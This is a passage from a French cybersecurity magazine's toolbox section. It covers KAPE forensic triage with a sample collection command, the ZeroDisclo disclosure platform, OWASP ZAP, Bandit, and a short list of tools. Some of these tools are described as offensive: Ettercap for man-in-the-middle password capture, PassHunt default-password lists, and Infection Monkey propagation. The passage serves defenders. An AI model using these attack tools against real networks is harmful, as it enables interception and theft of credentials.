derniers emails malicieux reçus. En complément, l’équipe sécurité dispose de toutes les informations nécessaires pour améliorer les règles de filtrage anti-spam/anti-phishing et déclarer l’attaque auprès des autorités (par exemple sur la plateforme Pharos). LUDOVIC LECOMTE | CISO, Inova Software & Membre du CESIN SWORDPHISH KAPE (Kroll Artifact Parser and Extractor) Même dans l’urgence, il est indispensable de conserver un maximum d’éléments permettant de retracer l’attaque. Lors d’une réponse à incident – processus durant lequel une réaction est organisée à un problème ou un fait de sécurité –, seule une enquête minutieuse peut permettre d’affirmer, par exemple, qu’une machine ne sera pas à nouveau compromise. Pour cela, il va falloir collecter un certain nombre d’artefacts, c’est-à-dire des éléments qui peuvent être utilisés comme preuves dans le cadre d’une enquête. Citons par exemple la liste des processus actifs, la liste des fichiers stockés sur un disque dur, les journaux d’événementsWindows.Letriageestlaphaseduprocessus de réponse à incident durant laquelle les artefacts sont collectés sur les machines compromises, puis analysés. Créé par l’entreprise Kroll, KAPE est l’un des outils les plus rapides pour réaliser le triage des artefacts. Il propose une vaste collection de plugins (appelés targets/ modules). Il est gratuit pour un usage éducatif ou de recherche, pour toutes les agences gouvernementales (qu’elles opèrent au niveau local, régional, fédéral ou international), mais également pour les entreprises qui en font un usage interne (il ne nécessite une licence commerciale que lorsqu’il est utilisé sur un réseau tiers, dans le cadre d’un engagement facturé). Vous trouverez des informations complémentaires sur https://ericzim- merman.github.io/KapeDocs. À ne pas oublier dans votre trousse à outils ! _10 : Collecter les informations en vue du forensic KAPE (Kroll Artifact Parser and Extractor) est un logiciel de triage sur des ordinateurs Windows, utilisable en ligne de commande, mais disposant aussi d’une interface graphique. Il est téléchargeable depuis le site www.kroll.com. Il requiert les privilèges administrateur pour collecter des artefacts et permet de rassembler la plupart des données nécessaires à une enquête judiciaire. La première phase d’exécution concerne la collecte des cibles (targets), c’est-à-dire les plugins qui déterminent quels sont les fichiers à copier (et les fichiers verrouillés par l’OS). La seconde est le lancement des modules (intégrés à Windows ou provenant de tiers) tels que Netstat, winPmem, qui peuvent utiliser les artefacts définis dans la première phase et qui génèrent en sortie des fichiers exploitables pour l’investigation (txt, csv, etc.). La configuration KAPE devrait être prête avant qu’un incident ne se produise. Une fois le logiciel téléchargé – typiquement sur un disque externe ou un disque réseau –, commencez par mettre à jour les modules en lançant gkape.exe et sélectionnez l’option en bas “Sync with Github”. Ensuite, téléchargez et placez dans “bin/annuire” les outils manquants (ex. : message d’erreur winPmem lors de la phase de lance- ment du test – Cannot find executable “winpmem.exe”), le lien vers l’outil est fourni dans les templates KAPE pour les targets/méthodes (champ : BinaryUrl). Une attaque a eu lieu ! Exécutez la commande suivante en tant qu’ad- ministrateur pour récupérer des artefacts : JAROSŁAW OPARKA | CSIRT Reverse Engineer, Atos kape.exe --tsource C: --tdest kape_%m_output --tflush --target WindowsDefender,WebBrowsers,$MFT,Amcache,EventLogs,- FileSystem,LnkFilesAndJumpLists,LogFiles,Prefetch, RegistryHives,WindowsTimeline --zip archive --mdest kape_%m_outputmodules --mflush --module BrowsingHis- toryView,MFTECmd,ARPCache,autoruns,DNSCache,han- dle,IPConfig,NetStat,ProcessDetails,qwinsta,SystemInfo,WinP- mem,TaskScheduler,RegRipper-ALL --zpw very_long_secure_password L A T R O U S S E À O U T I L S
  • 6. _10 / _11_Cyberun#12 La divulgation coordonnée de vulnérabilités (CVD) est le processus permettant une collaboration entre un hacker éthique et le responsable du SI. Les hackers éthiques peuvent significativement contribuer à accroître la sécurité numérique. Toutefois, le “premier contact” est souvent difficile à établir. De plus, même lorsqu’une vulnérabilité est signalée, les responsables du SI affecté peuvent préférer ne pas en tenir compte. Ce silence pousse à la divulgation publique, moyen de faire pression pour faire corriger la vulnérabilité. ZeroDisclo.com est une plateforme non partisane et gratuite, opérée par Yes We Hack, qui permet de signaler des vulnérabilités tout en gardant l’anonymat. Grâce à ZeroDisclo, la divulgation peut également se faire via le navigateur Tor. Lors de la rédaction, le hacker éthique choisit de laisser des coordonnées de contact. Quel que soit le navigateur utilisé, le rapport est chiffré avec la clé publique de l’organisation réceptrice (telle qu’un CERT privé ou national), puis signé et horodaté par une blockchain. Le site envoie le rapport, et le hacker signa- lant la vulnérabilité reçoit un certifi- cat en guise de preuve de dépôt. ZeroDisclo.com formalise le rap- port, notamment via différents critères permettant le calcul du score de sévérité CVSS. Plus important encore, le chiffrement du rapport assure que ZeroDisclo.com fait seulement office de “courroie de transmission”, et non de base de données de vulnérabilités. À aucun moment, la plateforme ou les individus qui l’administrent n’accèdent aux détails de la vulnérabilité décrite. Ce fonctionnement permet de faciliter la divulgation coordonnée de vulnérabilités, sans que ZeroDisclo.com n’ait à engranger une connaissance dangereuse des défaillances affectant les systèmes d’information de tiers. La confidentialité des informations sur le potentiel risque de sécurité est assurée ; l’intégrité du rapport l’est tout autant, grâce au chiffrement et à l’horodatage blockchain. Les enjeux de la divulgation coordonnée de vulnérabilités Lorsque les acteurs malveillants sont les seuls informés d’une vulnérabilité ou ont un avantage chronologique, le risque numérique augmente pour tous, notamment si les vulnérabilités ont des répercussions importantes. L’adoption de politiques de divulgation coordonnée a ainsi des bénéfices significatifs pour les parties prenantes : montée en maturité de la sécurité, développement de talents au sein des organisations et autonomie technologique de par la maîtrise renforcée des risques numériques liés à la gestion des vulnérabilités. La divulgation de vulnérabilités est un processus, et non un événement. Elle implique aussi une montée en maturité car elle requiert de comprendre, cartogra- phier, structurer, responsabiliser et de rendre opérant un processus, où les rôles et responsabilités des actifs numériques sont clairement identifiés et endossés. Le cycle de vie d’une vulnérabilité décrit les différents événements susceptibles de l’affecter et d’influencer le niveau de risque pour les utilisateurs, mais aussi la nécessité d’action de la part des différentes parties prenantes. En outre, une vulnérabilité découverte est susceptible d’être redécouverte dans un délai relative- ment court. Ces périodes déterminent les phases de variation de l’exposition aux risques. À cette notion de variation avec le cycle de vie de la vulnérabilité s’ajoutent les appétences différentes au risque. Il est donc primordial de maîtriser, autant que possible, le chaînon fondamental de la divulgation, afin de garantir la connaissance restreinte de l’existence et l’impact potentiel de la vulnérabilité. RAYNA STAMBOLIYSKA | VP Gouvernance et affaires publiques, Yes We Hack _11 : Divulgation coordonnée de vulnérabilités ZERODISCLO.COM De la qualité du code de vos applicatifs (sites web, développements “maison”, etc.) dépend essentiellement leur sécurité. Que faire pour la renforcer et comment gérer les vulnérabilités ? AMÉLIORER LES APPLICATIONS _12 Outil DAST (Dynamic Application Security Testing), il vise à tester la sécurité d’un site web selon son comportement dynamique. Développé par la vénérable organisation OWASP, ZAP dispose d’une communauté impressionnante. Avec 85 000 télé- chargements par mois, c’est l’un des outils de sécurité open source les plus populaires. Son interface graphique est datée, mais simple et efficace. La docu- mentation est très complète, et on trouve d’excellentes ressources sur Internet pour s’initier rapidement à ZAP et l’intégrer dans de nombreux environnements (par exemple sur Azure). Ecrit en Java, ZAP est multiplateforme (Windows/Linux/MacOS), ne nécessite pas d’installation (si l’environnement Java est déjà installé), se lance sans aucune difficulté et s’avère très fiable. Le mode automatique est particulièrement pratique pour obtenir rapidement l’intégration dans une chaîne CI/CD. ZAP intègre un module capable de trouver automatiquement les différentes URL d’un site. Si certaines alertes correspondent à des faux positifs, il est souvent judicieux de les prendre en compte et de faire évoluer son design pour les éviter. Pour les pentesters, le mode manuel permet de mener des attaques sophistiquées. Le lancement automatique d’un navigateur préconfi- guré est particulièrement appréciable. Le mode “request editor” permet de facilement personnaliser une requête initialement faite par le navigateur. L’outil conserve la trace de toutes les connexions, ce qui est très pratique pour revenir sur ce que l’on a fait (comme git pour un développeur). ZAP intègre un magasin d’extensions. On en trouve notamment pour l’intégration à Jenkins, pour le standard OpenAPI, pour SAML, etc. On peut également développer des extensions “maison” en Java, et même intégrer ZAP dans un programme Python (package python- owasp-zap) ! Site : https://www.zaproxy.org/ _13 Bandit est un outil SAST (Static Application Security Testing). Cela consiste à analyser le code source dans sa forme d’origine pour détecter des éventuelles formes de codage ou d’appels non sécurisés qui peuvent conduire à des failles (anti-patterns). Il est dédié au Python et peut compléter une analyse statique classique de type Linter pour couvrir les aspects sécuritaires. Initialement démarré par OpenStack, il a été repris par la communauté active PYCQA (Python Code Quality Authority). Son code source ouvert et gratuit permet d’étendre le jeu de “tests” au-delà des 70 existants, et de couvrir éventuellement plus de vulnérabilités (ex. : interdire une fonction, détecter le mode debug, etc.). L’outil peut se l a n ce r s u r u n répertoire de code Python. Il l’analyse en mode récursif, puis renvoie les résultats par criti- cité sur la ligne de commande, ou d a n s l ’u n d e s formats supportés p o u r d ’a u t r e s intégrations (html, csv, json, etc.). Naturellement, il peut retourner des faux positifs. Vous pouvez les gérer de différentes façons, avec précaution : en excluant des répertoires (de tests, par exemple), en ignorant certains tests à l’aide de skips, ou en annotant certaines lignes de code par le commentaire “#nosec”. Bandit est un outil simple, efficace et extensible, indispensable pour la sécurité du code Python. D’autres outils open source existent également en fonction des langages et frameworks utilisés. Site : https://github.com/PyCQA/bandit ABDERRHAMANE SMIMITE | Managing Director, Intuitem BANDIT Audit de sécurité “frugal” de code source La détection des vulnérabilités dans les chaînes CI/CD est devenue incontournable pour limiter les risques d’attaque sur les produits, services et API exposés. En effet, corriger un problème avant qu’il soit exploitable est bien plus rationnel qu’attendre une attaque pour réagir, d’autant plus si la démarche est automatisable. Par ailleurs, la cybersécurité n’échappe pas à la vague open source, a fortiori dans une période où les budgets sont sous pression. Dans le domaine du test de sécurité des applications, Bandit et ZAP sont des produits open source particulièrement populaires, seuls ou en compléments d’outils commerciaux plus ambitieux. Nous apprécions en particulier leur capacité à être intégrés à des chaînes CI/CD et leur extensibilité. OWASP ZAP L A T R O U S S E À O U T I L S
  • 7. Magnet Acquire : www.magnetforensics.com/resources Création d’images à fin forensique de smartphones (iOS/Android), disques durs et médias externes. Voir aussi sleuthkit.org. RIM (incident response methodologie) : github.com/certsocietegenerale/IRM Proposées par le CERT de la Société Générale, des fiches pratiques à utiliser pour mieux répondre aux incidents (à lire de préférence AVANT l’incident !). Infection monkey : github.com/guardicore/monkey Teste la résilience aux violations de périmètre et aux infections internes (pentesting automatisé) en utilisant différentes méthodes pour se propager à travers un datacenter. Lynis : cisofy.com/lynis Audite les serveurs sous Linux (et MacOS) afin d’en renforcer la sécurité (OS hardening) : contrôle des paramètres du noyau, des mécanismes d’authentification, de la journalisation... Peut utiliser, si nécessaire, les normes ISO 27001, PCI DSS ou HIPAA. Zed Attack Proxy : zaproxy.org Scanneur de vulnérabilités exclusivement dédié aux sites web (database Injection, cross site scripting injection, HTTP response splitting, .htaccess misconfigurations, shellshock, etc.). Voir aussi wapiti.sourceforge.io. Vuls : vuls.io Scanneur de vulnérabilités, utilisable en mode local ou distant, ne nécessitant pas l’installation d’agent. Permet le reporting grâce à vulsRepo. Cuckoo sandbox : cuckoosandbox.org Espace protégé et automatisé d’analyse de malwares : permet de qualifier un fichier suspect sans avoir besoin de l’envoyer dans le cloud (virustotal) et donc d’en préserver la confidentialité. Moloch : molo.ch Outil de capture de paquets réseaux, distribué à large échelle, permettant des recherches rapides (indexation). Ettercap : ettercap-project.org Intercepte le trafic réseau, permet de réaliser des attaques Man In The Middle, de récupérer des mots de passe sur HTTP, FTP et certains protocoles chiffrés. Peut être utilisé en complément de PassHunt (github.com/Viralmaniar), qui regroupe tous les mots de passe par défaut des équipements. Kismet : kismetwireless.org Détecteur passif de réseaux sans fil, détermine les points d’accès et les clients WiFi, détecte les sniffeurs actifs (NetStumbler), ainsi que les intrusions WiFi, bluetooth et d’autres protocoles sans fil (utilise alors un dongle SDR). 10 autres outils proposés par nos experts Le magazine Cyberun est un bimestriel édité par Cyberun, association loi 1901. Boîte 81, 206 quai de Valmy, 75010 Paris. Directrice de publication : Hélène Windish Rédacteur en chef : Stéphane Darget Look at Sciences a participé à ce numéro Création et maquette : www.rodolpherrera.fr ISSN : 2677-5964. Toute reproduction, traduction, reproduction intégrale ou partielle est interdite, sans l’autorisation écrite de Cyberun, sauf dans les cas prévus par l’article L122-5 du Code de la propriété intellectuelle. En tant qu’abonné au magazine, vous êtes autorisé à imprimer votre exemplaire. Prix au numéro (imprimé et expédié) : 25 € Les grognements de Cy Visiblement, je ne mets pas assez les pattes à la pâte. Résultat, je me les suis fait prendre dans le honeypot, comme un ourson bleu dans le pot de miel : comme il n’était pas question de rester à hiberner tout l’été, je devais à l’arrache mettre en place une solution de télépêche de saumon. Après un délicieux repas, j’ai choisi BearIot (qui, malgré son nom, était totalement immonde*) et pondu un excellent rapport. Mais... cette solution s’est avérée coûteuse, inefficace et, en fait, une resucée d’un vieux projet open source. Je vous passe les remontrances du Grand Chef, qui lui, évidemment, ne fait que papoter et arrive quand même à enchaîner les bourdes. OK, les tableaux de bord et les référentiels, c’est utile... Mais si j’avais un peu plus écouté Emma, la geekette, qui m’avait bien parlé d’un truc, et suivi ce MOOC technique sur les IoT... *(NdT : “to be a riot” : être génial, irrésistible) Qui sommes-nous ? Cyberun est un magazine totalement indépendant, édité par financement participatif. Il fédère une large communauté d’acteurs de la cybersécurité qui souhaitent partager leurs expertises et leurs expériences. Pour favoriser l’échange de connaissances et ne pas se contenter d’approximations, chaque numéro est dédié à un thème unique. Abonnez-vous gratuitement à Cyberun ! Recevez automatiquement le magazine en PDF en vous inscrivant sur cyberun.net et découvrez comment vous pouvez, vous aussi, participer à cette aventure ! Contactez-nous ! Pour diffuser ce magazine lors d’un événement, rejoindre la communauté, ou pour toute information complémentaire : www.cyberun.net (lien “Rejoignez la communauté !”) Cy-Bear, le gentil ours vivant en Alaska... Imprimez-moi ! Ne me jetez pas, partagez-moi !